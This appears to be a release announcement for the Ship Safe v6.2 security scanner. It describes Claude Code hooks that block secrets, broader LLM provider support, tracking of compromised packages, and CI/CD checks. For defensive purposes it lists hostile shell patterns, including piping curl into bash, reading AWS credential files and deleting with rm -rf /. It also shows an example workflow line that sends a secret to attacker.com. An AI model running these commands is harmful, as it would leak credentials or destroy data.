Ship Safe v6.2 is out. This release is focused on one idea: catching security issues as close to the source as possible, before they ever touch a file on disk.
Claude Code Hooks — Real-Time Secret Blocking
The headline feature is native integration with Claude Code's hooks system. One command installs ship-safe as both a PreToolUse and PostToolUse hook:
npx ship-safe hooks installAfter that, every file write Claude Code makes is screened automatically.
How it works
Claude Code fires hooks at two points in its tool execution lifecycle:
PreToolUse runs before the tool executes. For Write, Edit, MultiEdit, and Bash calls, ship-safe scans the content being written. If a critical secret is detected — an AWS Access Key, GitHub PAT, Stripe live key, OpenAI key, PEM private key, and 13 others — the write is blocked before anything reaches the filesystem. Claude sees the block message and is prompted to use an environment variable instead.
PostToolUse runs after a successful write. Ship-safe scans the saved file for high-severity patterns — database URLs with embedded credentials, high-entropy generic tokens, hardcoded passwords — and injects findings directly into Claude's context as advisory messages. Nothing is blocked at this stage; the goal is awareness for the next action.
Dangerous Bash patterns
The PreToolUse hook also intercepts Bash tool calls and blocks:
curl ... | bash/wget ... | sh— remote script execution without verificationiex (Invoke-WebRequest ...)— PowerShell equivalentcat ~/.aws/credentials— credential file readscurl https://... $GITHUB_TOKEN— environment variable exfiltration over the networknpm install --unsafe-perm— elevated install script privilegesgit commit -m "... ghp_...— secrets embedded in commit messagesrm -rf /or targeting system paths — recursive force deletes
These are the exact patterns that appear in supply chain attack payloads like CanisterWorm's postinstall scripts.
Why stable paths matter
A subtle but important implementation detail: when you run npx ship-safe hooks install, the hook scripts are copied to ~/.ship-safe/hooks/ — a stable, user-owned directory — before being registered in ~/.claude/settings.json. This is critical.
npx stores packages in a volatile cache directory that can be rotated or cleared at any time. If we registered the npx cache path directly, hooks would silently stop working after a cache rotation. By copying the scripts to a predictable location first, hooks remain functional regardless of what npx does later. Running npx ship-safe hooks install after an update refreshes the scripts.
Precision over recall
All 18 critical patterns require specific, vendor-issued prefixes:
| Pattern | Prefix |
|---|---|
| AWS Access Key ID | `AKIA` |
| GitHub PAT (classic) | `ghp_` |
| GitHub Fine-Grained PAT | `github_pat_` |
| npm Auth Token | `npm_` |
| Stripe Live Key | `sk_live_` |
| Slack Bot Token | `xoxb-` |
| Anthropic API Key | `sk-ant-api03-` |
| Supabase Service Role | JWT with `service_role` in payload |
| PEM Private Key | `-----BEGIN ... PRIVATE KEY-----` |
Generic high-entropy patterns (passwords, tokens) are advisory-only and gated by a Shannon entropy threshold of 3.5 — enough to suppress placeholder values like "your-secret-here" while catching real 256-bit random strings.
.env files are allowed but checked for .gitignore coverage. .env.example files are silently skipped entirely.
---
Universal LLM Support
Deep analysis and AI classification now work with any OpenAI-compatible provider via the --provider and --base-url flags:
# Use Groq for fast, cheap deep analysis
npx ship-safe audit . --deep --provider groq
# Use a local LM Studio instance
npx ship-safe audit . --deep --provider lmstudio
# Any OpenAI-compatible endpoint
npx ship-safe audit . --deep --base-url http://localhost:8000/v1 --model my-modelSupported providers with auto-detection from environment variables:
| Provider | Env Variable | Default Model |
|---|---|---|
| Groq | `GROQ_API_KEY` | llama-3.3-70b-versatile |
| Together AI | `TOGETHER_API_KEY` | Llama-3-70b-chat-hf |
| Mistral | `MISTRAL_API_KEY` | mistral-small-latest |
| DeepSeek | `DEEPSEEK_API_KEY` | deepseek-chat |
| xAI (Grok) | `XAI_API_KEY` | grok-beta |
| Perplexity | `PERPLEXITY_API_KEY` | llama-3.1-sonar-small-128k-online |
| LM Studio | *(none)* | Local server |
Anthropic, OpenAI, Google, and Ollama continue to work as before and are auto-detected from their existing environment variables. If multiple keys are set, the priority order is Anthropic → OpenAI → Google → Groq → Together → Mistral → DeepSeek → xAI.
---
Supply Chain IOC Matching
The SupplyChainAgent now checks your dependency tree against a list of known-compromised package versions. Currently tracked:
| Package | Bad Versions | Threat |
|---|---|---|
| `litellm` | 1.82.7, 1.82.8 | TeamPCP backdoor, auto-executing `.pth` file |
| `axios` | 1.8.2 | Malicious patch published via stolen npm token |
| `telnyx` | 2.1.5 | Credential harvesting postinstall |
The agent also flags ICP blockchain packages (@dfinity/agent, ic-agent) in the dependency tree as a CanisterWorm C2 indicator. The real CanisterWorm used the Internet Computer Protocol blockchain to host its command-and-control channel, making it resilient to domain takedowns.
---
CI/CD Detection Improvements
Two new patterns in the CICDScanner:
Environment variable exfiltration — catches secrets being sent over the network from GitHub Actions steps:
- run: curl https://attacker.com/?token=${{ secrets.API_KEY }}OIDC broad subject claims — catches wildcard OIDC trust relationships that allow any branch or PR to assume a cloud role:
# Dangerous: any branch can assume this role
subject: "repo:org/repo:*"The unpinned action detector was also tightened: @v1, @v1.2.3, and semver tags are now all flagged as unpinned. Only a full 40-character commit SHA is accepted as pinned.
---
What's next
- GitHub App integration — connect repos directly, scheduled scans, PR comments without CI changes
- EPSS live feed — real-time exploit probability scores from FIRST.org
- Hooks for Cursor and Windsurf — same real-time protection for other AI editors
Install the hooks now:
npx ship-safe hooks install
npx ship-safe hooks statusShip fast. Ship safe.